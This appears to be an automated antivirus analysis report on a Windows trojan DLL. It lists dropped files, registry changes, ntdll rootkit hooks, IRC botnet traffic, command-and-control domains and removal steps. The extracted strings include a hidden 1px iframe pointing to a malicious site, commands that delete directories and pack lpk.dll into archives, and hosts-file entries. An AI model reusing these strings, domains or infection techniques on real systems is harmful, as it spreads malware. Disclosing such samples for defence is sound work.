MD5: fb38a2f15e2f8f9efc2d819e07d98298
SHA1: 7597ea48a003b3236b0749e044efdabfabbf9bc5
SHA256: 8991698e4b8bc7202267e04451cbd7fc3ca16bc70647318c6d6f6c1aa581bd04
SSDeep: 6144:fg0mAkyz90EieibQVqOZ167e831JBM5n22aLN0vZHn9XSbTRIVcBmPzLiQ8:fg0momeibQVqOZ1Oe831l2u4H9yTR2PH
Size: 382464 bytes
File type: DLL
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2010-06-08 12:59:36
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:3708
hrl76A5.tmp:3796

The Trojan injects its code into the following process(es):

imugmu.exe:3624

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process regsvr32.exe:3708 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\hrl76A5.tmp (750 bytes)

The process imugmu.exe:3624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\RCX88FD.tmp (24748 bytes)
C:\Windows\System32\hra33.dll (7 bytes)
C:\Windows\Sys (385 bytes)
C:\Boot\lpk.dll (2105 bytes)

The process hrl76A5.tmp:3796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\imugmu.exe (2105 bytes)

Registry activity

The process hrl76A5.tmp:3796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SOFTWARE.LOG,"

[HKLM\System\CurrentControlSet\Services\Distribujdw]
"Description" = "Distribuyor Transaction Coordinator Service."

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
ilo.brenz.pl	148.81.111.121
teredo.ipv6.microsoft.com	157.56.120.207
dns.msftncsi.com	131.107.255.255
lang12397007.2288.org
bgigty.com
rnasqh.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Known Hostile Domain ilo.brenz.pl Lookup

Traffic

.m.(.Z...`.....&*.)..#..G.......5..............iK&....{......./...W.]$



:irc 001 dnzstabb :Hi virtu.:irc 376 dnzstabb :End of /MOTD command.:i
rc 001 dnzstabb :Hi virtu.:irc 376 dnzstabb :End of /MOTD command..:dn
zstabb JOIN #.364..:dnzstabb JOIN #.364.

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

KERNEL32.dll

USER32.dll

msvcrt.dll

ole32.dll

ntdll.dll

COMCTL32.dll

w9..mMa

regsvr32.pdb

RegCloseKey

RegOpenKeyExW

_wcmdln

_amsg_exit

version="5.1.0.0"

name="Microsoft.Windows.RegSvr32"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel

\regsvr32.exe

user32.dll

Excessive # of DLL's on cmdline

6.1.7600.16385 (win7_rtm.090713-1255)

REGSVR32.EXE

Windows

Operating System

6.1.7600.16385

imugmu.exe_3624:

.text

`.rdata

@.data

.rsrc

USER32.dll

ADVAPI32.dll

SHELL32.dll

WS2_32.dll

WINMM.dll

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

RegCloseKey

RegOpenKeyExA

RegOpenKeyA

ShellExecuteA

MFC42.DLL

MSVCRT.dll

_acmdln

WinExec

KERNEL32.dll

lang12397007.2288.org:1

-1838212312-1838212312

kernel32.dll

%u.%u.%u.%u

hra%u.dll

iexplore.exe

stf%c%c%c%c%c.exe

PlusCtrl.dll

SOFTWARE.LOG

%c%c%c%c%c%c.exe

%u MB

%u MHz

Windows NT

Windows 7

Windows 2008

Windows Vista

Windows 2003

Windows XP

Windows 2000

SOFTWARE\Microsoft\Windows NT\CurrentVersion

\Program Files\Internet Explorer\iexplore.exe

#0%s!

%s/%s

GET %s HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

%d.%d.%d.%d

192.168.1.244

@.reloc

SHLWAPI.dll

lpk.dll

;>QH.FQ?$84

#.Ynd

.YdP)

.cXRDs

%F]`k

M%Dkv

,t.va

/Ma.Kf

ADVAPI32.DLL

JOIN #.%d

DSTAMP %ddd

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

ilo.brenz.pl

ant.trenz.pl

NICK ugdxdwyw

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x  *%s

KERNEL32.DLL

windowsupdate

drweb

NICK lkpyunnz

Rm/C.GI

oh.nigim.pl

jot.tasb.ru

be.difti.at

o2.play9.pl

knx.remp.pl

NICK keuuwyrk

M~%d'Jm

\?.mD

xun.ilgo.ru

hus.limp.pl

mgw.mugu.pl

c7.polgo.pl

lid.gbil.ru

NICK ljgondtd

NICK medulzsl

%.6x . . :%c%.8x%x  %s

JOIN

127.0.0.1 VVV.Brenz.pl

#<iframe style="height:1px" src="hXXp://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>

cmd /c RD /s /q "%s"

"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"

"%s" x "%s" *.exe "%s\"

cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"

rar.exe

1, 0, 0, 1

server.EXE

imugmu.exe_3624_rwx_0041B000_00001000:

M%Dkv

imugmu.exe_3624_rwx_0042B000_00001000:

/Ma.Kf

imugmu.exe_3624_rwx_0042D000_00007000:

ADVAPI32.DLL

JOIN #.%d

DSTAMP %ddd

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

ilo.brenz.pl

ant.trenz.pl

NICK ugdxdwyw

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x  *%s

KERNEL32.DLL

windowsupdate

drweb

imugmu.exe_3624_rwx_00435000_00007000:

ADVAPI32.DLL

JOIN #.%d

DSTAMP %ddd

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

ilo.brenz.pl

ant.trenz.pl

NICK lkpyunnz

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x  *%s

KERNEL32.DLL

windowsupdate

drweb

imugmu.exe_3624_rwx_00442000_00008000:

ADVAPI32.DLL

JOIN #.%d

DSTAMP %ddd

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

oh.nigim.pl

jot.tasb.ru

be.difti.at

o2.play9.pl

knx.remp.pl

NICK keuuwyrk

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x  *%s

KERNEL32.DLL

windowsupdate

drweb

imugmu.exe_3624_rwx_00451000_00008000:

ADVAPI32.DLL

JOIN #.%d

DSTAMP %ddd

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

xun.ilgo.ru

hus.limp.pl

mgw.mugu.pl

c7.polgo.pl

lid.gbil.ru

NICK ljgondtd

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x  *%s

KERNEL32.DLL

windowsupdate

drweb

imugmu.exe_3624_rwx_0045A000_00007000:

ADVAPI32.DLL

DSTAMP %ddd

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

ilo.brenz.pl

ant.trenz.pl

NICK medulzsl

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x  %s

JOIN

127.0.0.1 VVV.Brenz.pl

#<iframe style="height:1px" src="hXXp://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>

KERNEL32.DLL

windowsupdate

drweb

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   regsvr32.exe:3708
   hrl76A5.tmp:3796

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\hrl76A5.tmp (750 bytes)
   C:\RCX88FD.tmp (24748 bytes)
   C:\Windows\System32\hra33.dll (7 bytes)
   C:\Boot\lpk.dll (2105 bytes)
   C:\Windows\System32\imugmu.exe (2105 bytes)

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.